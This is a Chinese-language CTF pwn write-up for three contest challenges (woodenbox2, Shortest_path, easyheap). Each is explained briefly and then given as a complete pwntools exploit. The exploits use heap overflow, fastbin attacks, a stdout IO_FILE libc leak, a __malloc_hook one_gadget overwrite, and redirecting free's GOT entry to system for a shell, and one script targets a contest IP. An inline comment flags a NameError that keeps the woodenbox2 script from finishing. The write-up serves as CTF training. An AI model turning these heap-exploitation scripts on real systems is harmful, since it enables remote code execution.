高校战疫网络安全分享赛 pwn 复盘

就做了一个 pwn，我 tcl
但是收获很多
总结一下还是不够细心，如果细心一点估计还能多做 3、4 个，tttttcl

woodenbox2

这道题先是用 chunk overlap（堆块重叠），然后将 unsorted bin 切割到 fastbin（此时 unsorted bin 与 fastbin 指向了同一个堆块），通过堆溢出将低位覆盖为 stdout 上方的位置，再写 IO_FILE 结构体 leak 出 libc 基址，最后通过 fastbin attack 打 __malloc_hook 即可。
IO_FILE 结构体的相关知识可以看一下：

https://wiki.x10sec.org/pwn/io_file/exploit-in-libc2.24/

exp:

from pwn import *
p=process('./woodenbox2')   # local process only; this script has no remote target
elf=ELF('./woodenbox2')
# pwntools resolves the libc the local binary links against; the symbol
# offsets used later are therefore tied to this machine's libc build.
libc=elf.libc

def add(size,name):
	"""Menu option 1: choice and size are sent as lines, the name as raw bytes (no newline)."""
	for line in ('1', str(size)):
		p.sendlineafter(':', line)
	p.sendafter(':', name)

def edit(idx,size,content):
	"""Menu option 2: choice, index and size as lines, then the raw content bytes."""
	for line in ('2', str(idx), str(size)):
		p.sendlineafter(':', line)
	p.sendafter(':', content)

def delete(idx):
	"""Menu option 3: send the choice and then the index, each as a line."""
	for line in ('3', str(idx)):
		p.sendlineafter(':', line)


# Four entries requested with size 0x68, each fully filled.
add(0x68,'0'*0x68)
add(0x68,'1'*0x68)
add(0x68,'2'*0x68)
add(0x68,'3'*0x68)
# edit() is given size 0x70 for an entry created with 0x68 -- 8 bytes more
# than requested; this is the heap overflow the writeup describes, and the
# trailing p64(0xe1) lands past the entry's own data.
edit(0,0x70,'0'*0x68+p64(0xe1))
# Index 1 is freed twice.
delete(1)
delete(1)
add(0x38,'a'*0x38)
add(0x28,'b'*0x28)
# Only a 2-byte partial write after the 0x71 size field; the exact bytes
# depend on the libc build and layout of the machine the writeup ran on.
payload='b'*0x28+p64(0x71)+'\xdd\x25'
edit(2,len(payload),payload)
add(0x68,'\x00'*0x68)

# Per the writeup, this write reaches the stdout _IO_FILE struct so the
# program leaks a libc address on its next output.
add(0x68,'\x00'*0x33+p64(0xfbad3c80)+3*p64(0)+p8(0))
# Leak parsing: the 6 bytes ending in 0x7f, zero-extended to 8, minus the
# stderr FILE symbol and a fixed 192-byte offset.
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['_IO_2_1_stderr_']-192
log.success('libcbase: '+hex(libcbase))
# one_gadget offsets hard-coded for the libc used here; only o_g[0] is used.
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget=libcbase+o_g[0]
malloc_hook=libcbase+libc.sym['__malloc_hook']
realloc=libcbase+libc.sym['__libc_realloc']
delete(3)
payload='a'*0x28+p64(0x71)+p64(malloc_hook-0x23)
edit(1,len(payload),payload)
add(0x68,'a'*0x68)
add(0x68,'a'*11+p64(one_gadget)+p64(realloc+15))
# BUG: `size` is only a parameter of add()/edit(), never a module-level
# name, so str(size) raises NameError here and the script never reaches
# p.interactive() in a clean run.
p.sendlineafter(':','1')
p.sendlineafter(':',str(size))
p.interactive()

Shortest_path

这题 flag 竟然被读到了堆上面，直接填过去打印就行了
exp:

#!/usr/bin/python2
from pwn import *
p=process('./Shortest_path')   # local process only; no remote target in this script

def add(idx,pri,size,name,num):
	"""Menu option 1: every field, including the name, is sent as a line after its prompt."""
	steps = (
		('> ', '1'),
		(': ', str(idx)),
		(': ', str(pri)),
		(': ', str(size)),
		(':', name),
		(': ', str(num)),
	)
	for prompt, line in steps:
		p.sendlineafter(prompt, line)

# Four entries; each name is shorter than the requested size (0x38 bytes
# for a 0x68 entry, 0x30 for the 0x48 one).
add(0,2,0x68,'\x11'*0x38,0)
add(1,2,0x68,'\x11'*0x38,0)
add(2,2,0x68,'\x11'*0x38,0)
add(3,2,0x48,'\x11'*0x30,0)
# Menu option 4 with index 3, then '3'; per the writeup this prints the
# heap region the flag was read into.
p.sendlineafter('> ','4')
p.sendlineafter(': ',str(3))
p.sendlineafter(': ','3')
p.interactive()

easyheap

这题堆指针释放后没有清空，可以利用 fastbin 链表的性质做两次利用：先将 free 的 GOT 表项写成 puts 即可泄露，然后再将 free 写成 system，释放拿到 shell。
exp:

#!/usr/bin/python2
from pwn import *
#p=process('./easyheap')
p=remote('121.36.209.145',9997)   # contest endpoint used in the writeup; the local process() line above is kept commented out
elf=ELF('./easyheap')
#libc=ELF('./libc.so.6')
# elf.libc resolves the libc the *local* binary loads, so the symbol
# offsets below only match the remote service if it ships the same libc
# build; the commented ./libc.so.6 line is the alternative.
libc=elf.libc

def add(size,content):
	"""Menu option 1: choice and size as lines, then the raw content bytes after the '?' prompt."""
	p.sendlineafter(':', '1')
	p.sendlineafter('?', str(size))
	p.sendafter('?', content)

def timuchadd(size):
	"""Menu option 1 with only the size sent; no content is written afterwards."""
	for prompt, line in ((':', '1'), ('?', str(size))):
		p.sendlineafter(prompt, line)

def edit(idx,content):
	"""Menu option 3: choice and index as lines, then the raw content bytes."""
	for prompt, line in ((':', '3'), ('?', str(idx))):
		p.sendlineafter(prompt, line)
	p.sendafter('?', content)

def delete(idx):
	"""Menu option 2: send the choice, then the index, each as a line."""
	choose = p.sendlineafter
	choose(':', '2')
	choose('?', str(idx))

add(0x68,'\x11'*4)#0
add(0x180,'\x12'*4)#1
add(0x20,'/bin/sh\x00')#2 -- the entry that delete(2) at the end passes to free()
delete(0)
delete(1)
# Two 0x100000-byte requests with no content sent (timuchadd skips the
# content prompt); their effect on the target is not visible from this script.
timuchadd(0x100000)
timuchadd(0x100000)
# Entry 0 is edited after it was freed (the uncleared pointer the writeup
# relies on). 0x6020C0 is a hard-coded address from this particular
# binary -- not PIE-safe and valid only for this build.
edit(0,p64(0)+p64(0x21)+p64(elf.got['free'])+p64(0x1000)+p64(0)+p64(0x71)+p64(0)*13+p64(0x21)+p64(0x6020C0))
edit(0,p64(elf.got['atoi']))
# Entry 1 receives puts@plt; per the writeup this overwrites free's GOT entry.
edit(1,p64(elf.plt['puts']))
# With free redirected, delete(0) prints what entry 0 points at: atoi's address.
delete(0)
# one_gadget offsets hard-coded for the libc of this binary; one_gadget is
# computed below but never used (system is used instead).
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
# Leak parsing: 6 bytes ending in 0x7f, zero-padded to 8, minus atoi's offset.
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['atoi']
one_gadget=libcbase+o_g[3]
system=libcbase+libc.sym['system']
edit(1,p64(system))
log.success('libcbase: '+hex(libcbase))
# Per the writeup, freeing entry 2 now runs system on its "/bin/sh" content.
delete(2)
p.interactive()